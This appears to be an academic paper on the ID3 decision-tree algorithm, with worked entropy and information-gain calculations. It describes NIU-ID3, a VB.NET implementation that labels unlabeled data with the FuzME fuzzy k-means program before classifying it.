A decision tree is a flow-chart-like tree structure. The topmost node in the tree is the root node. Each node in the tree specifies a test on some attribute, and each branch descending from the node corresponds to one of the possible values of the attribute, except for the terminal nodes, which represent the classes. An instance is classified by starting at the root node of the tree, testing the attribute specified by the given node, then moving down the tree branch corresponding to the value of the attribute in the given example. This process is repeated for the subtree rooted at the current node. In order to classify an unknown sample, the attribute values of the sample are tested against the decision tree: a path is traced from the root to a leaf node that holds the class for that instance.

According to [9], Top-Down Induction of Decision Trees (TDIDT) systems are general-purpose systems which classify sets of examples based on their attribute-value pairs. A TDIDT algorithm can be rerun to include new examples in the data sets; while this is a useful feature, it is also time-consuming. One of the earliest TDIDT algorithms is the Concept Learning System (CLS) by Hunt in 1966.
The CLS algorithm works by presenting the system with training data, from which a decision tree is developed top-down based on frequency information. In 1986, Quinlan modified the CLS algorithm by enhancing it with the concept of windowing and an information-based measure called entropy. The entropy is used to select the best attribute on which to split the data into subsets, so that the produced decision tree will be the same every time. The concept of windowing is used to ensure that all the cases in the data are correctly classified.

According to [10], there are several reasons that make decision trees a very attractive learning tool, such as:

- Decision tree learning is a mature technology. It has been in existence for 20+ years, has been applied to various real-world problems, and the learning algorithm has been improved by several significant modifications.
- The basic algorithm and its underlying principles are easily understood.
- It is easy to apply decision tree learning to a wide range of problems.
- Several good, easy to use decision tree learning packages are available.
- It is easy to convert the induced decision tree to a set of rules, which are much easier for humans to evaluate and manipulate, and to incorporate into an existing rule-based system, than other representations.

5 The ID3 algorithm

According to [9], the ID3 algorithm is a decision tree building algorithm which determines the classification of objects by testing the values of their properties. It builds the tree in a top-down fashion, starting from a set of objects and a specification of properties. At each node of the tree, a property is tested and the result is used to partition the object set. This process is carried out recursively until each subset is homogeneous, in other words until it contains objects belonging to the same category; such a subset then becomes a leaf node.
At each node of the tree, the tested property is chosen on the basis of an information-theoretic criterion that seeks to maximize the information gain and minimize the entropy. In simpler terms, the chosen property is the one that divides the set of objects into the most homogeneous possible subsets. The ID3 algorithm has been successfully applied to a wide variety of machine learning problems. It is a well-known algorithm; however, the approach has some limitations.

In ID3, windowing consists of selecting a random subset of the training set (the window) to build the initial tree. The remaining input cases are then classified using the tree. If the tree gives the correct classification for these input cases, then it is accepted for the whole training set and the process ends. Otherwise, the misclassified cases are appended to the window and the process continues until the tree classifies all cases correctly.

The information-theoretic heuristic is used to produce shallower trees by deciding an order in which to select attributes. The first stage in applying it is to calculate the proportions of positive and negative training cases currently available at a node; in the case of the root node, this is all the cases in the training set.
A value known as the information needed for the node is calculated using the following formula, where \( p \) is the proportion of positive cases and \( q \) is the proportion of negative cases at the node:

\[ - p \log_2 p - q \log_2 q \]

The basic ID3 algorithm. According to [11, 12, 13, 14], given a set of examples \( S \), each of which is described by a number of attributes along with the class attribute \( C \), the basic pseudo code for the ID3 algorithm is:

- If (all examples in \( S \) belong to class \( C \)) then make a leaf labeled \( C \)
- Else select the "most informative" attribute \( A \)
- Partition \( S \) according to \( A \)'s values \( (v_1, \ldots, v_n) \)
- Recursively construct sub-trees \( T_1, \ldots, T_n \) for each subset of \( S \).

ID3 uses a statistical property, called the information gain measure, to select among the candidate attributes at each step while growing the tree. To define the concept of information gain, it uses a measure commonly used in information theory, called entropy. The entropy is calculated by:

\[ \text{Entropy}(S) = \sum_{i=1}^{c} - p_i \log_2 p_i \]

where \( S \) is a set consisting of \( s \) data samples and \( p_i \) is the proportion of \( S \) belonging to class \( i \). Notice that the entropy is 0 when all members of \( S \) belong to the same class, and 1 when the collection contains an equal number of positive and negative examples. If the collection contains unequal numbers of positive and negative examples, the entropy is between 0 and 1. In all calculations involving entropy, the outcome of \( 0 \log_2 0 \) is defined to be 0.

Given entropy as a measure of the impurity in a collection of training examples, a measure of the effectiveness of an attribute in classifying the training data can be defined.
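The entropy calculation described above can be sketched in a few lines of Python (our illustration; the paper's own implementation is in VB.net):

```python
from math import log2

def entropy(class_counts):
    """Entropy of a collection given its per-class counts;
    the 0 * log2(0) case is taken to be 0, as stated above."""
    total = sum(class_counts)
    return sum(-(c / total) * log2(c / total) for c in class_counts if c > 0)

# A pure collection has entropy 0, an even positive/negative split has
# entropy 1, and a 9-positive / 5-negative collection has entropy ~0.940.
assert entropy([14, 0]) == 0.0
assert entropy([7, 7]) == 1.0
assert round(entropy([9, 5]), 3) == 0.94
```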
This measure is called information gain, and it is the expected reduction in entropy caused by partitioning the examples according to the attribute. More precisely, the information gain \( \text{Gain}(S, A) \) of an attribute \( A \), relative to a collection of examples \( S \), is defined as:

\[ \text{Gain}(S, A) = \text{Entropy}(S) - \sum_{v \in \text{Values}(A)} \frac{|S_v|}{|S|} \text{Entropy}(S_v) \]

where \( \text{Values}(A) \) is the set of all possible values for attribute \( A \), and \( S_v \) is the subset of \( S \) for which attribute \( A \) has value \( v \). The first term in the equation is the entropy of the original collection \( S \), and the second term is the expected value of the entropy after \( S \) is partitioned using attribute \( A \). \( \text{Gain}(S, A) \) is therefore the expected reduction in entropy caused by knowing the value of attribute \( A \), and the attribute having the highest information gain is preferred over the others. Information gain is precisely the measure used by ID3 to select the best attribute at each step in growing the decision tree.

As an example, indicated in [4, 9, 13, 15, 16, 17, 18 and 19], consider a decision model to determine whether the weather is amenable to playing baseball. Historic data of observations over a period of two weeks is available to build the model, as depicted in Table 1.
<table> <thead> <tr> <th>Day</th> <th>outlook</th> <th>temperature</th> <th>humidity</th> <th>wind</th> <th>play ball</th> </tr> </thead> <tbody> <tr> <td>D1</td> <td>sunny</td> <td>hot</td> <td>high</td> <td>weak</td> <td>no</td> </tr> <tr> <td>D2</td> <td>sunny</td> <td>hot</td> <td>high</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D3</td> <td>overcast</td> <td>hot</td> <td>high</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D4</td> <td>rain</td> <td>mild</td> <td>high</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D5</td> <td>rain</td> <td>cool</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D6</td> <td>rain</td> <td>cool</td> <td>normal</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D7</td> <td>overcast</td> <td>cool</td> <td>normal</td> <td>strong</td> <td>yes</td> </tr> <tr> <td>D8</td> <td>sunny</td> <td>mild</td> <td>high</td> <td>weak</td> <td>no</td> </tr> <tr> <td>D9</td> <td>sunny</td> <td>cool</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D10</td> <td>rain</td> <td>mild</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D11</td> <td>sunny</td> <td>mild</td> <td>normal</td> <td>strong</td> <td>yes</td> </tr> <tr> <td>D12</td> <td>overcast</td> <td>mild</td> <td>high</td> <td>strong</td> <td>yes</td> </tr> <tr> <td>D13</td> <td>overcast</td> <td>hot</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D14</td> <td>rain</td> <td>mild</td> <td>high</td> <td>strong</td> <td>no</td> </tr> </tbody> </table> Table 1: Sample data to build a decision tree using the ID3 algorithm. The weather data attributes are: outlook, temperature, humidity, and wind. The target class is the classification of the given day as being suitable (yes) or not suitable (no). The domains of each of the attributes are: - outlook = (sunny, overcast, rain). - temperature = (hot, mild, cool). - humidity = (high, normal). - wind = (weak, strong). To determine which attribute should be the root node of the decision tree, the gain is calculated for all four attributes. 
First, we calculate the entropy of the full set of examples \( S \): \[ \text{Entropy}(S) = - \frac{9}{14} \log_2 \left( \frac{9}{14} \right) - \frac{5}{14} \log_2 \left( \frac{5}{14} \right) = 0.940 \] Next, we calculate the information gain of the wind attribute. The weak branch contains 8 examples (6 positive, 2 negative) and the strong branch contains 6 examples (3 positive, 3 negative): \[ \text{Entropy}(\text{weak}) = - \frac{6}{8} \log_2 \left( \frac{6}{8} \right) - \frac{2}{8} \log_2 \left( \frac{2}{8} \right) = 0.811 \] \[ \text{Entropy}(\text{strong}) = - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) = 1.00 \] \[ \text{Gain}(S, \text{wind}) = \text{Entropy}(S) - \frac{8}{14} \text{Entropy}(\text{weak}) - \frac{6}{14} \text{Entropy}(\text{strong}) = 0.940 - \frac{8}{14} \times 0.811 - \frac{6}{14} \times 1.00 = 0.048 \] Similarly, the gain is calculated for the other attributes: \[ \text{Gain}(S, \text{outlook}) = 0.246 \] \[ \text{Gain}(S, \text{temperature}) = 0.029 \] \[ \text{Gain}(S, \text{humidity}) = 0.151 \] Because the outlook attribute has the highest gain, it is used as the decision tree root node. Since the outlook attribute has three possible values, the root node has three branches, labeled sunny, overcast and rain. The next step is to develop the sub-tree, one level at a time, starting from the left (under sunny) using the remaining attributes, namely humidity, temperature and wind. 
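The entropy and gain calculations above can be sketched in code. This is a minimal illustration over the Table 1 data, not part of the NIU-ID3 system; the function names and data layout are our own:

```python
from math import log2

# Table 1 as (outlook, temperature, humidity, wind, play ball) tuples
DATA = [
    ("sunny", "hot", "high", "weak", "no"),
    ("sunny", "hot", "high", "strong", "no"),
    ("overcast", "hot", "high", "weak", "yes"),
    ("rain", "mild", "high", "weak", "yes"),
    ("rain", "cool", "normal", "weak", "yes"),
    ("rain", "cool", "normal", "strong", "no"),
    ("overcast", "cool", "normal", "strong", "yes"),
    ("sunny", "mild", "high", "weak", "no"),
    ("sunny", "cool", "normal", "weak", "yes"),
    ("rain", "mild", "normal", "weak", "yes"),
    ("sunny", "mild", "normal", "strong", "yes"),
    ("overcast", "mild", "high", "strong", "yes"),
    ("overcast", "hot", "normal", "weak", "yes"),
    ("rain", "mild", "high", "strong", "no"),
]
ATTRS = {"outlook": 0, "temperature": 1, "humidity": 2, "wind": 3}

def entropy(labels):
    """Entropy(S) = sum over classes of -p_i * log2(p_i)."""
    n = len(labels)
    return -sum((labels.count(c) / n) * log2(labels.count(c) / n)
                for c in set(labels))

def gain(examples, attr):
    """Gain(S, A): entropy of S minus the weighted entropy of the
    subsets S_v obtained by partitioning on attribute A."""
    i = ATTRS[attr]
    g = entropy([e[-1] for e in examples])
    for v in set(e[i] for e in examples):
        subset = [e[-1] for e in examples if e[i] == v]
        g -= len(subset) / len(examples) * entropy(subset)
    return g
```

For this data, `gain(DATA, "outlook")` is the largest of the four gains, matching the choice of outlook as the root node.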
The calculation of gain is then carried out within each branch for each of the remaining attributes, given the value of the attribute on the path so far. The final decision tree obtained as the result of the ID3 algorithm is depicted in figure 1. The following rules are generated from the above decision tree: - IF outlook= overcast THEN play ball= yes - IF outlook= rain ∧ wind= strong THEN play ball= no - IF outlook= rain ∧ wind= weak THEN play ball= yes - IF outlook= sunny ∧ humidity= high THEN play ball= no - IF outlook= sunny ∧ humidity= normal THEN play ball= yes 5.1 Features of ID3 The most important feature of the ID3 algorithm is its capability to break a complex decision down into a collection of simpler decisions, thus providing a solution which is often easier to interpret. In addition, some of its other important features are: - Each attribute can provide at most one condition on a given path. This also contributes to the comprehensibility of the resulting knowledge. - Complete hypothesis space: any finite discrete-valued function can be expressed. - Incomplete search: searches greedily through the hypothesis space until the tree is consistent with the data. - Single hypothesis: only one current hypothesis (the best one) is maintained. - No backtracking: once an attribute is selected, this choice cannot be changed. - Full training set: attributes are selected by computing information gain on the full training set. 6 Design and implementation 6.1 Different types of attributes Because the ID3 algorithm deals with discrete-valued attributes, we have decided to limit the number of values per attribute to four. The reason for this is to obtain simple decision trees and rules. If the number of different values per attribute is greater than four, the NIU-ID3 system reduces it to four by the use of discretization (normalization) techniques. 
This process is carried out directly on numerical attributes; for symbolic attributes the same process is carried out after coding the attribute values. For a continuous-valued attribute A, the system partitions the attribute values into four intervals by: \[ \text{Length of interval} = \frac{\text{Max}_A - \text{Min}_A}{C} \] where MaxA is the maximum value of attribute A, MinA is the minimum value of attribute A and C is the number of intervals (default value 4). For example, if we have a numerical attribute with the following values: 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 76, 77, 79, we can calculate the interval length as \((79 - 43) / 4 = 9\). Table 2 depicts the original values with their corresponding new values. <table> <thead> <tr> <th>Original values</th> <th>Corresponding values</th> </tr> </thead> <tbody> <tr> <td>43, 44, 45, 46, 47, 48, 49, 50, 51</td> <td>11</td> </tr> <tr> <td>52, 53, 54, 55, 56, 57, 58, 59, 60</td> <td>12</td> </tr> <tr> <td>61, 62, 63, 64, 65, 66, 67, 68, 69</td> <td>13</td> </tr> <tr> <td>70, 71, 72, 73, 74, 76, 77, 79</td> <td>14</td> </tr> </tbody> </table> Table 2: The original values with their corresponding new values. Another example is a symbolic attribute that has the following values: BB, CC, DD, EE, FF, GG and HH. Such attribute values are dealt with in the following way: - First, the values are coded as: 01, 02, 03, 04, 05, 06 and 07. - Second, we calculate the interval width as: (7 - 1) / 4 = 1.5, which places the interval boundaries at 2.5, 4 and 5.5, with the four resulting intervals labeled 11, 12, 13 and 14. Table 3 depicts the original values with their corresponding codes and new values. 
<table> <thead> <tr> <th>Original values</th> <th>Corresponding values</th> <th>Corresponding discretized values</th> </tr> </thead> <tbody> <tr> <td>BB, CC</td> <td>01, 02</td> <td>11</td> </tr> <tr> <td>DD</td> <td>03</td> <td>12</td> </tr> <tr> <td>EE, FF</td> <td>04, 05</td> <td>13</td> </tr> <tr> <td>GG, HH</td> <td>06, 07</td> <td>14</td> </tr> </tbody> </table> Table 3: The original values with their corresponding codes and new discretized values. Each code for the corresponding values consists of two digits: the first represents the attribute number and the second represents the interval number (the attribute's value). For example, the code 13 is the third value of the first attribute. ### 6.2 System Design We will demonstrate the design and implementation of our system, which is a new implementation of the ID3 algorithm that makes it work in an unsupervised manner by building a front-end to it. Our system is called New Implementation of Unsupervised ID3 (NIU-ID3). We will also give an overview of the overall architecture of NIU-ID3, the tasks that the system can deal with, the data format that it uses and the results that it produces. The NIU-ID3 system accomplishes its task via several stages that are executed serially in the form of a wizard (Data Mining Wizard). These stages are grouped into four main components: - Data set: the data from which knowledge is to be discovered. - Preprocessing: preparing the data for classification if the data is continuous or unlabeled. - Classification: the classification process (ID3 algorithm) that produces the knowledge. - Knowledge: the results discovered by the classification process. The NIU-ID3 system can work with two types of data files: text data or Access databases. It can also preprocess unlabeled data (clustering of data objects) and process labeled data (classification). 
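The equal-width discretization of section 6.1 (Tables 2 and 3) can be sketched as follows. This is our own illustrative code, not the NIU-ID3 implementation; the function name and the clamping of the maximum value into the last interval are assumptions:

```python
def discretize(values, attr_no=1, c=4):
    """Map each value to a two-digit code: the first digit is the
    attribute number, the second the interval number (1..c), using
    c equal-width intervals of width (max - min) / c."""
    lo, hi = min(values), max(values)
    width = (hi - lo) / c
    codes = []
    for v in values:
        k = int((v - lo) / width) if width > 0 else 0
        k = min(k, c - 1)  # the maximum value belongs to the last interval
        codes.append(attr_no * 10 + k + 1)
    return codes
```

For the numeric example (interval length (79 - 43) / 4 = 9), values 43 to 51 map to code 11 and values 70 to 79 map to code 14, reproducing Table 2; applying it to the symbol codes 1 through 7 reproduces Table 3.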
Our system can discover knowledge in two different formats, namely decision trees and classification rules. Building a NIU-ID3 model: The model building phase can start by building a simulated model of the problem. This model will provide a clear understanding of the problem in question. From the literature, there are three perspectives used in the development of simulated models: - Use Graphical User Interface (GUI) tools to develop the simulated model on the screen, use arcs to connect the system components to create the logical model, and then run the simulated model. “In most cases, due to the limitation of the simulation program under use, some simplifications and approximations to the model may be required. Such simplifications or approximations can be very costly.” [20]. - Support the belief that no simulation program would be able to model all tasks of a system without some modification. “This suggests that models should be developed from scratch by using a simulation modeling language.” [20]. This approach may increase the time needed to produce the system and may divert the developer to pay more attention to programming challenges than to understanding the system. - Focus on the use of a GUI that automatically generates code, with the possibility of developer intervention to make some changes to the code to match the system requirements. This is a very popular practice because it reduces the time needed to produce the system; on the other hand, code modification is a tedious task. Figure-2: General architecture of the NIU-ID3 system. Figure-3: Build process of the NIU-ID3 system. The model building phase consists of a number of steps, as follows: 1. Data loading, which consists of two sub-steps: - In loading data, our system deals with two types of data files: text data files and Access database files. Our system will ask the user to select the file type. 
The system was initially designed to deal only with Access database files, so if the loaded data is not an Access database file, a preprocessing step will convert it into one. The loaded database is called the training set. This data set consists of a set of tuples; each tuple consists of a number of values plus an additional attribute called the class attribute. At this stage, the ADO.NET technique is used to establish the connection between the database and the system. ADO.NET is part of the base class library included with the Microsoft .NET framework, and it is a set of software components that programmers can use to access data. ADO.NET cannot connect to data sources directly; it needs .NET data providers. Here we use the OLE DB .NET data provider and Microsoft® Universal Data Access Components 2.5 or 2.6 (MDAC 2.5 or MDAC 2.6). - The data selection sub-step will display the names of all available Access tables to the user, so he/she can select one of them and the system starts the discovery process. There are some conditions on the data file that is loaded into our system; we will explain them in the next section. 2. Preprocessing consists of four sub-steps: - Check missing values: if there are missing values in the loaded data, our system will ask the user to change the data file, because the system is not equipped to deal with missing values. - Converting a text file to an Access database file: if the loaded data file is a text file, the system will convert it into an Access database file. - Data labeling: if the loaded data is unlabeled, the system will label it via the clustering component of the system. - Continuous and discrete-valued attributes: ID3 does not work with continuous-valued attributes. 
If the number of values per attribute is more than four, the system will divide the range of attribute values into intervals using the interval-length equation. 3. Classification is the process of building a model or function that can be used to predict the class of unclassified data objects. In our system we use the ID3 algorithm for this task. 4. Knowledge is the end result produced by our system. The end result can take different forms, such as a decision tree, decision rules or more general simplified rules. The end results can be saved in text files, along with the data, if the user desires. 7 Clustering Front-End module The goal of the NIU-ID3 system is to build a decision tree and to extract classification rules (decision rules) from the provided data set. Such rules can be used for prediction. The classification module of our system (the ID3 algorithm) needs a labeled data set to train the classifier. Such a data set consists of a number of records, each of which consists of several attributes. There is one distinguished attribute called the dependent (class) attribute. In the case of unlabeled data, the clustering module is used to carry out the labeling process. In this section, we focus on one clustering algorithm, the fuzzy k-means algorithm (an extension of the normal k-means clustering method), and its software package, the FuzME program, which serves as a front-end module to our system. 7.1 Clustering methods In general, clustering is the process of grouping data objects into groups or clusters such that: - Each group or cluster is homogeneous or compact with respect to certain characteristics; that is, objects in each group are similar to each other. - Each group should be different from other groups with respect to the same characteristics; that is, objects of one group should be different from the objects of other groups. 
Clustering is an unsupervised learning technique used to divide data sets into groups or clusters. These clusters can be viewed as groups of elements which are more similar to each other than to elements belonging to other groups. An alternative definition of a cluster is a region with a relatively high density of points, separated from other clusters by a region with a relatively low density of points. "Clustering is a useful technique for the discovery of some knowledge from a dataset. It maps a data item into one of several clusters, where clusters are natural groupings of data items based on similarity metrics or probability density models. Clustering pertains to unsupervised learning, when data with class labels are not available." [21]. In general, data clustering algorithms can be categorized as hierarchical or partitioning. Hierarchical algorithms find successive clusters using previously established clusters, whereas partitioning algorithms find all clusters at once. Our system's clustering algorithm: As mentioned previously, our system works in an unsupervised fashion, which requires labeling unlabeled data before it can generate knowledge in the form of a decision tree. To label unlabeled data, our system uses a program called FuzME, which is based on the fuzzy k-means clustering algorithm. **Fuzzy k-means algorithm**: In fuzzy clustering, each data object has a degree of belonging in each cluster; that is, each data object belongs to all clusters with a varying degree of membership. Thus, data objects on the edge of a cluster belong to the cluster to a lesser degree than data objects in the center of the cluster. In fuzzy k-means clustering, the centroid of a cluster is the mean of all objects, weighted by their degree of belonging to the cluster. "Fuzzy-k-means clustering is an extension of the normal, crisp-k-means clustering method to account for uncertainties associated with class boundaries and class membership. 
As in k-means clustering, the iterative procedure minimizes the within-class sum of squares, but each object (or cell on a map) is assigned a continuous class membership value ranging from 0 to 1 in all classes, rather than the single class membership value of 0 or 1 used in the normal k-means clustering method (De Gruijter and McBratney, 1988). Fuzzy-k-means clustering was conducted using the FuzME program (Minasny and McBratney, 2002) with Mahalanobis distance and a fuzzy exponent of 1.2. Each cell was assigned to a single yield category based on the highest fuzzy membership value at this particular location." [22]. **FuzME program**: Our NIU-ID3 system uses the FuzME program (based on the fuzzy k-means algorithm) as a front-end module to label unlabeled data objects. The FuzME program was published and presented by Minasny B. and McBratney A. in 2002 from the Australian Centre for Precision Agriculture (ACPA) at the University of Sydney, Australia. More information about the program can be found on the following web site: http://www.usyd.edu.au/su/agric/acpa. **Input to FuzME program**: According to [23], the data file accepted as input to the FuzME program must be in text format, where the first row must start with the word "id" followed by the attribute names. The second and subsequent rows start with the id as a number for each data object, followed by the values of the attributes separated by a single space. As an example, figure-4 depicts an input to the FuzME program. The data file consists of 14 instances, each of which consists of four attributes. 
<table> <thead> <tr> <th>Id</th> <th>Outlook</th> <th>Temperature</th> <th>Humidity</th> <th>Wind</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Sunny</td> <td>Hot</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>2</td> <td>Sunny</td> <td>Hot</td> <td>High</td> <td>Strong</td> </tr> <tr> <td>3</td> <td>Overcast</td> <td>Hot</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>4</td> <td>Rain</td> <td>Mild</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>5</td> <td>Rain</td> <td>Cool</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>6</td> <td>Rain</td> <td>Cool</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>7</td> <td>Overcast</td> <td>Cool</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>8</td> <td>Sunny</td> <td>Mild</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>9</td> <td>Sunny</td> <td>Cool</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>10</td> <td>Rain</td> <td>Mild</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>11</td> <td>Sunny</td> <td>Mild</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>12</td> <td>Overcast</td> <td>Mild</td> <td>High</td> <td>Strong</td> </tr> <tr> <td>13</td> <td>Overcast</td> <td>Hot</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>14</td> <td>Rain</td> <td>Mild</td> <td>High</td> <td>Strong</td> </tr> </tbody> </table> Figure-4: Text file format presented to the FuzME program. **Output of FuzME program**: The execution of the FuzME program generates many text files as output: a number of files named n_class, where n is the number of clusters produced (i.e. 2_class.txt, 3_class.txt, 4_class.txt, 5_class.txt, etc.), a number of files named n_dscr that contain descriptions of the produced clustering files (i.e. 2_dscr.txt, 3_dscr.txt, 4_dscr.txt, 5_dscr.txt, etc.), plus the Control, FuzMeout, pca and summary files. Our system needs to use only one n_class file, the one corresponding to the number of clusters that the user specified. 
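The fuzzy membership computation underlying these cluster assignments can be sketched as below. This is the standard fuzzy k-means membership formula, not FuzME's actual code; for simplicity we use Euclidean distance, whereas the paper quotes FuzME runs with Mahalanobis distance:

```python
import math

def fuzzy_memberships(point, centroids, m=1.2):
    """Membership u_i of one point in each cluster i:
    u_i = 1 / sum_j (d_i / d_j)^(2/(m-1)), where d_i is the distance
    to centroid i and m is the fuzzy exponent (the paper quotes
    m = 1.2 for the FuzME runs)."""
    d = [math.dist(point, c) for c in centroids]
    for i, di in enumerate(d):
        if di == 0.0:  # point coincides with a centroid: full membership
            return [1.0 if j == i else 0.0 for j in range(len(d))]
    return [1.0 / sum((d[i] / dj) ** (2.0 / (m - 1.0)) for dj in d)
            for i in range(len(d))]
```

Memberships always sum to 1, and a point close to one centroid receives a membership near 1 in that cluster, which is why picking the highest membership (as FuzME's n_class files do) yields a crisp label.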
The output file of the FuzME program is a text file listing each data object and the cluster that it falls in. For example, the output text file depicted in figure-5 is the result of executing the FuzME program on the data of figure-4 with the desired number of clusters set to 2; the two clusters are coded as 2a and 2b respectively, so the output file name is 2_class.txt. Our system needs only the second column (the class) and adds it to the original data text file, as depicted in figure-6, to be used as input to the system. Front-End module implementation: In our system, we link the FuzME program with the implementation of the ID3 algorithm by a shell function, a VB.NET 2005 technique used to link to external objects. "A Shell link is a data object that contains information used to access another object in the Shell's namespace that is, any object visible through Microsoft Windows Explorer. The types of objects that can be accessed through Shell links include files, folders, disk drives, and printers. A Shell link allows a user or an application to access an object from anywhere in the namespace." [24]. The external object that is accessed or linked to must reside on the current computer's disk drives. 8 Experiments and results The purpose of this study is to produce different forms of knowledge and to implement the ID3 algorithm in supervised and unsupervised fashion using Visual Basic.net 2005. In this paper, we demonstrate the results obtained by applying our system to different types and sizes of data from a variety of domains. To test the effectiveness of our system, we have conducted experiments using several real data sets (databases) that are available in the public domain (the Internet). All of our experiments were performed on a PC running Microsoft Windows XP Professional (service pack 2) with a processor speed of 2.7 GHz, 512 MB of RAM and an 80 GB hard disk. 
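The labeling step described above, taking the class column from the n_class file and appending it to the original data, can be sketched as follows. The exact file layout is our assumption based on the description in this section (header row in the data file, one "id label" row per instance in the class file, same row order), not a FuzME specification:

```python
def label_data(data_path, class_path, out_path):
    """Append the cluster label from an n_class file as a new 'class'
    column on a space-separated data file (our reading of figures 4-6)."""
    with open(data_path) as f:
        data_lines = [ln.strip() for ln in f if ln.strip()]
    with open(class_path) as f:
        class_rows = [ln.split() for ln in f if ln.strip()]
    labeled = [data_lines[0] + " class"]  # extend the header row
    for row, cls in zip(data_lines[1:], class_rows):
        labeled.append(row + " " + cls[1])  # second column is the label
    with open(out_path, "w") as f:
        f.write("\n".join(labeled) + "\n")
```

The resulting file has the same format as the original input plus a final class column, which is exactly what the ID3 module expects as a labeled training set.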
The PC is also equipped with Microsoft® Universal Data Access Components 2.5 or 2.6 (MDAC 2.5 or MDAC 2.6) and a reference to the Microsoft® OLE DB Service Component 1.0, stored as "C:\Program Files\Common Files\System\OLE DB\oledb32.dll". Our system works with Access databases, and with text files after a preprocessing step that converts them into Access database files; then the actual loading of the data into the system can take place. Access database file: the Access database file name can be numerical or symbolic, and the file must consist of at least one relational table, whose name can also be numerical or symbolic. The relational table, as depicted in figure-7, consists of a number of tuples, each of which has a number of attributes. The attributes can be numeric or symbolic, discrete or continuous. Numerical attribute values can be real or integer. Each attribute must have a value, so no missing values are allowed. A symbolic attribute value can consist of symbols, numbers or both. Each tuple corresponds to one instance (example). Text file specifications: The text file name accepted by our system can be numerical or symbolic, and the file can contain any type of data (numerical or symbolic). Each text file consists of a number of rows or lines, as depicted in figure-8. The first line consists of the attribute names; the second line and subsequent ones contain the data. The data values can be of any type (i.e. numerical or symbolic): numerical attribute values can be real or integer, and a symbolic attribute value can consist of symbols, numbers or both. The values in each row must be separated by one space. Each row corresponds to one example or instance and consists of the values of the attributes. Here, too, no missing values are allowed. Figure-8: Text file format. Our experiments: We have conducted a total of 8 experiments with different data sets. The data sets differ in data types and sizes. 
The results of these experiments are summarized in Table 4 as follows: <table> <thead> <tr> <th>Experiment No.</th> <th>Data set name</th> <th>Data type</th> <th>Data labeled or unlabeled</th> <th>No. of tuples</th> <th>No. of attributes including class attribute</th> <th>No. of tree levels</th> <th>No. of decision rules</th> <th>No. of simplified rules</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Play tennis</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>14</td> <td>5</td> <td>3</td> <td>5</td> <td>2</td> </tr> <tr> <td>2</td> <td>Club membership</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>12</td> <td>5</td> <td>2</td> <td>2</td> <td>2</td> </tr> <tr> <td>3</td> <td>Stock market</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>10</td> <td>4</td> <td>3</td> <td>4</td> <td>2</td> </tr> <tr> <td>4</td> <td>London stock market</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>6</td> <td>6</td> <td>3</td> <td>3</td> <td>2</td> </tr> <tr> <td>5</td> <td>Titanic</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>2201</td> <td>4</td> <td>3</td> <td>5</td> <td>2</td> </tr> <tr> <td>6</td> <td>Iris</td> <td>Symbolic/ continuous/ numerical</td> <td>Labeled</td> <td>150</td> <td>5</td> <td>3</td> <td>9</td> <td>3</td> </tr> <tr> <td>7</td> <td>Unlabeled play tennis</td> <td>Symbolic/ discrete</td> <td>Unlabeled</td> <td>14</td> <td>1</td> <td>3</td> <td>4</td> <td>2</td> </tr> <tr> <td>8</td> <td>Unlabeled Titanic</td> <td>Symbolic/ discrete</td> <td>Unlabeled</td> <td>2201</td> <td>3</td> <td>2</td> <td>4</td> <td>2</td> </tr> </tbody> </table> Table 4: Summary of the experiment results. Based on the results obtained from our system, the authors would like to make the following remarks: 1. All experiments produced decision trees with at most three levels, because we used discretization techniques to reduce the number of values per attribute to 4. 2. The results obtained from experiments no. 
1, 2, 3 and 4 are the same as the results in [8, 9, 12, 13, 15, 16, 17, 18, and 19]. 3. We had no previous results for experiment no. 5, so we could not compare it with earlier ones; we consider this result satisfactory, given the accurate results obtained in experiments 1 to 4. 4. For experiment no. 6, there were some differences between our results and the results published in [25, 26 and 27]. The differences could be due to: - The discretization (normalization) technique used in [25]. - The C4.5 (classification) algorithm and the discretization (normalization) technique used in [26 and 27]. 5. The results obtained from experiments no. 7 and 8 differ from those of experiments no. 1 and 5; this could be due to the labeling process performed by the FuzME program. 9 Conclusion In this paper, we have added a front-end to the ID3 algorithm so that it works in unsupervised mode. Generally, our system consists of two parts: the first part is the implementation of the ID3 algorithm, used to classify labeled data sets; the second part is used to label unlabeled data sets using the FuzME program. Our system, NIU-ID3, has been tested with a number of different data sets (labeled and unlabeled, of different data types and sizes). We believe that our system will enable decision makers such as managers, analysts, engineers and physicians to make the correct decisions. From our system's results, we can conclude that: 1. Our system has produced very accurate results, such as the ones in experiments 1, 2, 3, and 4. 2. The decision trees produced by our system were very clear to visualize. 3. The rules produced by our system were simple to understand and clear to visualize. 4. We consider the result obtained for experiment no. 5 satisfactory. 5. The differences between the results of experiment 6 and the original results from [25, 26 and 27] could be due to the discretization techniques used and the difference in the classification algorithm, or, as in experiments 7 and 8, to the labeling process. References: [27] 